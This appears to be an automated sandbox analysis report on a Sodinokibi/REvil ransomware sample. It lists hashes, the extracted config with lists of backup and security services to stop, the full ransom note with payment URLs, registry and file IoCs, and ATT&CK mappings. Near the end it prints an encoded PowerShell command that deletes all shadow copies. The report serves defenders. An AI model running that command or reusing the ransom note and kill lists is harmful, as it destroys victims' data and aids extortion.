sodinokibi | 97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463

General

Target

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
Size

221KB
MD5

77ed1092409c927f5cd1992021f99147
SHA1

4c9027e660614db7fe653e67a7ac0b726b52cc44
SHA256

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463
SHA512

1e01f85f50179fb7620680809862c28c8955e696b397acd6766a2d8a18b81cc08f99c2a059213797ea8de1e004412b9d4853cf1c2ae9f451505322b00e26238a
SSDEEP

6144:Za/6o9aptGtbbqcqjuEyileXEHpSYxyEpq:S5atGtfqcqju3iXHpSgq

Score

10^/10

sodinokibi $2a$10$mabwjcxkb3kropx5kearm.sc7uhuubcbvrc/j3kvhmn3f11eujg3.4402 persistence ransomware

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

Campaign

4402

Decoy

gopackapp.com

croftprecision.co.uk

sanyue119.com

chatizel-paysage.fr

falcou.fr

theshungiteexperience.com.au

xn--vrftet-pua.biz

slimani.net

vibethink.net

mrxermon.de

hebkft.hu

danskretursystem.dk

castillobalduz.es

pmc-services.de

advizewealth.com

pixelarttees.com

testcoreprohealthuk.com

ino-professional.ru

alvinschwartz.wordpress.com

mercantedifiori.com

Attributes

net
true
pid
$2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.
prc
isqlplussvc
mydesktopqos
onenote
ocomm
dbsnmp
powerpnt
winword
thebat
sql
infopath
visio
firefox
tbirdconfig
wordpad
agntsvc
msaccess
sqbcoreservice
xfssvccon
dbeng50
thunderbird
outlook
mspub
excel
mydesktopservice
steam
ocautoupds
oracle
encsvc
synctime
ocssd
ransom_oneliner
Soon you may lose your files FOREVER Find: "readme-{EXT}-NOW.txt" in folders or on your desktop! YOU HAVE A FEW DAYS OR A FILE WILL BE LOST FOREVER !!!
ransom_template
Your files are locked due to a vulnerability in your system by "{EXT}" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/{UID} If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} After going to the site, enter the following code: {KEY}
sub
4402
svc
vss
backup
svc$
memtas
sql
veeam
mepocs
sophos

Extracted

Path

C:\Users\readme-cr0v4-NOW.txt

Ransom Note

Your files are locked due to a vulnerability in your system by "cr0v4" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/B455AE79B35BE10E If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B455AE79B35BE10E After going to the site, enter the following code: wlWlX1hKr7/taxO8KVG324TRSZko6yQnAlI3D2Gjqo9WP/osOkI9oBWUd3JDQln6 VSV/3I4UGHepHjb/ZakJs5zEhS1DG3XZgTdh6g8VtCBOppvBlJZ/P70JK2tTFal1 EzEBfxQNs4/ZLqrR7oJrIVo2BBqfscp2rocRpx/vIyl3mddTxhpCV93mFxaB8c+x u0dJJUc6PkxGwlYHry/59aLdFgsLhHUw0Qtrm2uXubUTa6+yCb0vSxwfEc0vUmEy +qUJxLU2wSieXzKq1zg7jK196cvi8BDQb1BNvajuM2bSH4pZJgUYIMunUcyR2AtT J7Pfkj+T+4TUmh8pF5aYHklR8Q+9Exbxl0Ona/KMKyaCym5AuIFwptWD1rwMbUJb TvwonmtGGJ8Kk/K22H/CkywgsSPNtYJVwY8Udn7Oh6EdxCE38mQmL6h9/FTzBHOk HbolGEyGg/YP3gyzY7y9+vbjco1/C7j+1dlqrmQd4Xyr6TbEvyLuAG4mEKdb6p9z GwSAfyJxugDmVtmTpy//cnsT4WPLfucTTXmEBPp6qUQIzGnC6xL/0DcrQr0k+Ek+ gCwUrH6Cxr7u/p3vVf9t2o7AXOzuY4qVqGuibT+6wBUwkSlWr1k55lC55OwVwual pvmIu1dZZ5mE79OucRK+OQmDMDe7YUXk065hLy5ABEQwIsinwBPbLSSubaNUsSJG 8/lSm70ycODrM7RwJnLyeau+BAOVSWxHtVUtOwVlvxueooWqBPAVucTSDWJq1s8T 5b2np80T4i/AQWXMJ8QmIpE8/lAJJnb5GIk0IYi6hAmlNoKXrL2JemaBj1y0iEzs pxSDAVrSMmVUJBgR07VO0aVS5Is1cB4ibo6F28Ygxgge8rVnPgOE4BXYnUzBCrwV ryXWIp9KMhJDgQ04dxQH2j4ITQE3FIW9aBURK9Ihs7K14xpG8ljy8Y46xtqHDqMt gj9UA2fZkRkuovpMsUS1HGowGG7ekME5CW+XVyBCad4G/gf3FUnC9mku6pP4ESJM G5cNuC8xk2u3ewXKvtK81F4GXkGsFAa0Bv004GvMeiDgs2CDy32zSc3RTsF3fUdU xZMebicg908oJs2xXcGtZ0+IndaC+CkfogeycVzf97QruSDYgePZTjsGJBU2idh/ iOLq5W+h+6GbFatH8hWc2CyXTZz9XDQkLJr32UGQDcpLaVB8LW/HATJSNRXo0mVL OUGbS1x0nBZknPGQasDGR/EJnEYlhGhxotOW2LD6J8qgZWbs08IQTOGdgWDuftH4 KHbJ76EodeYwkbbQhD9+l5e2eHE+HT8Aml8Qa4+oPQX+Ccf/JQsiYaiRtSYqFhDq 5yeIR9x55E/3NgFbnhrSC0jB+BP5NhxADru51VhP

URLs

http://decryptor.cc/B455AE79B35BE10E

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B455AE79B35BE10E

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oXnEn2JlQT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe"	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

description	ioc	process
File opened (read-only)	\??\H:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\J:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\V:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\Z:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\I:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\M:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\O:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\R:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\T:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\Y:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\F:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\B:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\E:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\G:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\L:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\P:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\A:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\K:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\N:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\Q:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\S:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\U:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\W:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\X:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened (read-only)	\??\D:	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

Drops file in System32 directory 1 IoCs

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2c6s4cgd3z.bmp"	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

Drops file in Program Files directory 16 IoCs

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

description	ioc	process
File opened for modification	\??\c:\program files\MeasureWait.vdw	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File created	\??\c:\program files (x86)\readme-cr0v4-NOW.txt	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\CheckpointInstall.zip	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\EnterSplit.aifc	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\StartGrant.doc	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\readme-cr0v4-NOW.txt	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\ApproveExit.wdp	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\BackupUnprotect.xlsx	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\ExportUnlock.mp3	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\OpenSave.wm	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\RemoveGrant.pot	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\readme-cr0v4-NOW.txt	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\readme-cr0v4-NOW.txt	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File created	\??\c:\program files\readme-cr0v4-NOW.txt	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\ConvertToInitialize.i64	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
File opened for modification	\??\c:\program files\OpenCopy.cr2	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exepowershell.exe

pid process

2332 97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
1952 powershell.exe

pid	process
2332	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
1952	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2332	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeBackupPrivilege	2436	vssvc.exe
Token: SeRestorePrivilege	2436	vssvc.exe
Token: SeAuditPrivilege	2436	vssvc.exe
Token: SeTakeOwnershipPrivilege	2332	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

description	pid	process	target process
PID 2332 wrote to memory of 1952	2332	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe	powershell.exe
PID 2332 wrote to memory of 1952	2332	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe	powershell.exe
PID 2332 wrote to memory of 1952	2332	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe	powershell.exe
PID 2332 wrote to memory of 1952	2332	97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
"C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2888

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2436

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

3

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab4684.tmp
Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar48D8.tmp
Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\readme-cr0v4-NOW.txt
Filesize
5KB

MD5
78828999c43b717fe00afd1fa00833ba

SHA1
b385d9f09b73e2d390ed8de004a39d8f4be64e28

SHA256
1e4025b1ef5c97649c18112a16d8c5a5dcfc9a5da6d97d1cf25114ed05e601e5

SHA512
ce9146e0af633bed5154c6158268627d508b13d056e549ce7fe03a2980fa14e7f7d96ff7bdd8bcb2bcff87f0b7533e783dcb4b7ca3baaf32de97815767f5d76c

Download Submit
C:\Windows\System32\catroot2\dberr.txt
Filesize
194KB

MD5
bc6362a1913e12e51168d98208922f59

SHA1
b69d30da0f081e7e320c49d127f5308a20828863

SHA256
f4af4fe75782f895049ff9ab95657481be015503918eb46633bd174869d4180b

SHA512
